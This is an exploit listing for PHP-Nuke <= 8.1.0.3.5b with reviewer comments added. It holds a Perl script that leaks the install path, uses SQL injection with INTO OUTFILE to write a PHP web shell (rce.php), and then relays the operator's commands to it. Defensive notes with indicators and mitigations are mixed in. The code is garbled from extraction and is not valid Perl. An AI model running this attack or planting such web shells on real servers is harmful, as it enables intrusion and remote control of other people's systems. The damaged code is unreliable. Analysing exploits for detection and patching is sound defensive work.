CVE | Category | Price | Severity |
---|---|---|---|
N/A (No CVE assigned) | CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') | Price not disclosed | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2010-07-13 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
# PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit
# Author/s: Dante90 & yawn
# Contact Us: www.unitx.net
# Requirements: magic_quotes_gpc : off
# Greetings: #[email protected] | #[email protected]
# You will remember, Watson, how the dreadful business of the
# Abernetty family was first brought to my notice by the depth which the
# parsley had sunk into the butter upon a hot day.
# -- Sherlock Holmes
#
# Reviewer notes (defensive reading of this listing)
# --------------------------------------------------
# NOTE(review): the listing was damaged during page extraction (it is not
# valid Perl as shown) and is reproduced unchanged; only line breaks and
# comments were added.
#
# What the script does, in the order the statements run:
#   1. Path disclosure: requests themes/NukeNews/theme.php directly and
#      parses a PHP "No such file or directory in <b>...</b>" error to learn
#      the server-side installation path.
#   2. SQL injection: POSTs to modules.php (name=Your_Account, op=activate)
#      with a check_num value that closes the quoted string and appends
#      UNION SELECT ... INTO OUTFILE, asking the database to write a PHP
#      file named rce.php under the disclosed path.
#   3. Command relay: sends each line typed by the operator as the cmd query
#      parameter of rce.php and prints the response body.
#
# Classification: the injected parameter is SQL, so the root cause visible
# here is SQL injection (CWE-89); OS command execution is the consequence of
# the file written in step 2, not of a command-injection sink in PHP-Nuke.
#
# Preconditions, stated or implied: magic_quotes_gpc off (header above);
# PHP errors displayed to clients (step 1); for INTO OUTFILE, MySQL requires
# the FILE privilege on the application's database account and a destination
# the database server process can write to -- presumably the web root here.
#
# Indicators a defender can search logs and disks for, all taken from the
# literals below: User-Agent "Mozilla 5/0"; direct GETs of
# themes/NukeNews/theme.php; POSTs to modules.php with name=Your_Account,
# op=activate and username=WTF; check_num bodies containing UNION or
# INTO OUTFILE; a file rce.php in the application root; GETs of rce.php
# carrying a cmd parameter.
#
# Mitigations: validate check_num and bind it as a query parameter; remove
# the FILE privilege from the web application's database account and set
# secure_file_priv; keep the web root unwritable by the database server; turn
# display_errors off; block direct requests to theme include files.
# magic_quotes_gpc is not a fix -- it was removed in PHP 5.4.
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;

# Prints the usage banner. The banner names [username] and [password]
# arguments, but only the host argument is read further down.
sub Nuke::Usage {
    print " n [0-Day] PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploitn";
    print " ------------------------------------------------------ n";
    print " * USAGE: *n";
    print " * cd [Local Disk]:\ *n";
    print " * perl name_exploit.pl [host] [username] [password] *n";
    print " * -> REMEMBER TO ADD THE FINAL / TO THE HOSTNAME <- *n";
    print " ------------------------------------------------------ n";
    print " * Powered By Dante90 & yawn *n";
    print " * www.unitx.net *n";
    print " ------------------------------------------------------ n";
}

#VARS
# Clears the terminal, then shows the banner.
system $^O eq 'MSWin32' ? 'cls' : 'clear';
Nuke::Usage();
# Target base URL taken from the first command-line argument.
my $host = shift || die;
my $cmd;
# PHP payload that the injected query asks the database to write to disk.
my $shell = "<?php echo system($_GET["cmd"]); ?>"; # Change Here to Set your custom shell (for example use system() );
my $cookies = HTTP::Cookies->new;
my $request = LWP::UserAgent->new;
# Static, malformed User-Agent string: usable as a log indicator.
$request->agent("Mozilla 5/0");
$request->cookie_jar($cookies);
#END VARS

# Step 1: returns the path captured from the PHP error message in the
# response to a direct request for the theme file, or the string "failed"
# when the error text is absent (for example with display_errors off).
sub Full_Path_Disclosure() {
    my $Get = $request->get($host.'themes/NukeNews/theme.php');
    if ($Get->content =~ /No such file or directory in <b>(.+?)</b> on line/i) {
        return $1;
    } else {
        return "failed";
    }
}

print " * Getting Full Pathn";
my $path = Full_Path_Disclosure();
die " * Failed Path Extraction" if ($path eq "failed");
# Strips the theme file's relative path from the captured value.
$path =~ s/themes(/|\)NukeNews(/|\)theme.php//g;
print " * Full Path Found: $pathn";
# NOTE(review): looks like path-separator handling for Windows hosts; the
# patterns are damaged in this listing, so this cannot be confirmed.
if ($path =~ m/\/) {
    $path =~ s/\/\\\\/g;
}
print " * Injecting Shell To $hostn";
# Step 2: check_num carries the injected SQL. The response is never
# inspected, so the success messages below are printed unconditionally.
my $req2= $request->post($host."modules.php?name=Your_Account&op=activate&username=WTF",
    {
        check_num => "'UNION/**/SELECT 1,2,3,4,5,6,'".$shell."' FROM `nuke_authors` INTO OUTFILE '$path"."rce.php",
    },
    Referer => $host."index.php");
print " * Injecting Successfully Completedn";
print " * Shell now available on $host"."rce.phpn";
print " * Connecting to remote shelln";
sleep(4);
print " * Connected.. Type "quit" to quitn";
# Step 3: relays each input line, unencoded, as the cmd query parameter of
# rce.php and prints the response body until the operator types "quit".
while() {
    print "* root@backdoor ~$ ";
    $cmd = <>;
    chomp($cmd);
    last if $cmd eq "quit";
    $req2 = $request->get($host."/rce.php?cmd=".$cmd);
    print $req2->content."n";
}